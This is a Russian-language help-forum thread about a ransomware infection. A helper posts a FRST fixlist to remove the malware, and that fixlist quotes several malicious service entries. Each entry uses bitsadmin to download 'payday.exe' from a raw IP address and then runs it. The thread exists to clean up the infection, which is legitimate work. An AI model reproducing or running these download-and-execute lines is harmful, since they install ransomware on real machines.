Перейти к содержанию

шифровальщик starbax@tutanota.de

bartleby
 Share

Рекомендуемые сообщения

bartleby Новичок

bartleby

Опубликовано
Опубликовано (изменено)

Добрый день

Поймали шифровальщика

Шифрование началось ночью примерно в 3 часа и к утру большая часть файлов была зашифрована

Примеры зашифрованных файлов, файлов readme.txt и логи прилагаю

Спасибо

FRST.txt

Addition.txt

Shortcut.txt

files.zip

README.zip

CollectionLog-2018.06.20-13.07.zip

Изменено пользователем bartleby
Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Печально. Это похоже и есть шифратор. Его нет даже на исходном сервере.

 

Пробуйте с помощью программ восстановления данных, которые нужно установить на несистемный диск, поискать файл среди удаленных.

 

Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует?

 

+ 1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
HKLM-x32\...\RunOnce: [{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}] => cmd.exe /C start /D "C:\Users\A5A32~1.PEK\AppData\Local\Temp" /B {3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd
Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} -  No File
S2 BvWn; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe
S2 eINJ; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe <==== ATTENTION
S2 WbZa; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe
S2 Googler; C:\Windows\System32\nssm.exe [121344 2017-11-15] () [File not signed]
C:\Windows\System32\nssm.exe
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную.
Ссылка на комментарий
Поделиться на другие сайты
bartleby Новичок

bartleby

Опубликовано
  • Автор
Опубликовано

Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует?

 

Конкретно такого нету.. есть папка похожего вида но другое имя и пустая.

 

 

 

 

Ссылка на комментарий
Поделиться на другие сайты
bartleby Новичок

bartleby

Опубликовано
  • Автор
Опубликовано

Система была проверена KVRT лог приложить не дает

На скрине то что он нашел


Пробуйте выполнять поиск payday.exe и 7061796461992E657865 среди удаленных

 

А потом фикс в Farbar

 

Сканирую систему по результату отпишусь

post-50192-0-90071000-1529491043_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Александр94
      Шифровальщик
      От Александр94
      Поймаи шифровальщик один в один как в теме  
       
      csb.log.[MJ-UE8059316472](decodehop@gmail.com ).rar csb.log.[MJ-UE8059316472](decodehop@gmail.com ).rar FRST.txt Addition.txt
    • WhySpice
      Шифровальщик cyberfear
      От WhySpice
      Утром снесло домашний сервер с открытым вне RDP. Зашифровало абсолютно все, все мои рабочие проекты, python скрипты, виртуалки vmware/virtualbox

      Зашифрованный файл: https://cloud.mail.ru/public/qDiR/yEN8ogSZJ
      Addition_06-01-2025 15.06.34.txt FRST_06-01-2025 15.01.14.txt
      README.txt
    • sater123
      Вирус шифровальщик
      От sater123
      Добрый день. Зашифровались файлы размером более 8 мегабайт (их почта datastore@cyberfear.com). Помогите пожалуйста.
      Зашифрованные файлы не могу прикрепить, так как их размер более 5Мб.
      FRST.txt Addition.txt
    • BOBO
      Шифровальщик WantToCry
      От BOBO
      Попросили создать новую тему не знаю почему ту закрыли вот создаю. Меня тоже взломали 25 числа hdd весит на роутере, smb открыт был. Покапалься в файлах были несколько оригинальных файлов и вроде шифрование AES в режиме ECB. Встал вопрос можно ли найти ключ шифрования если например нашел зашифрованный блок пробелов 16 байт. 
    • FineGad
      Шифровальщик WantToCry
      От FineGad
      26.12.24 На файловом сервере (комп с Debian) в расшареных каталогах заметил текстовый файл !want_to_cry.txt 
      Просканировал все каталоги доступные по сети (SMB) зашифрованные файлы с расширением .want_to_cry по времени создания файлов видно что шифровальщик проработал примерно с 24.12.24 20:05  по 25.12.24 03:05 после чего сервер "завис". Сейчас шифровщик не активен (новые шифрованные файлы не появляются). Доступа к сети извне нет, кроме SSH с ключом шифрования. В сети кроме моего во время активности были еще 2 компьютера под управление Windows.
       
      !want_to_cry.txt
×
×
  • Создать...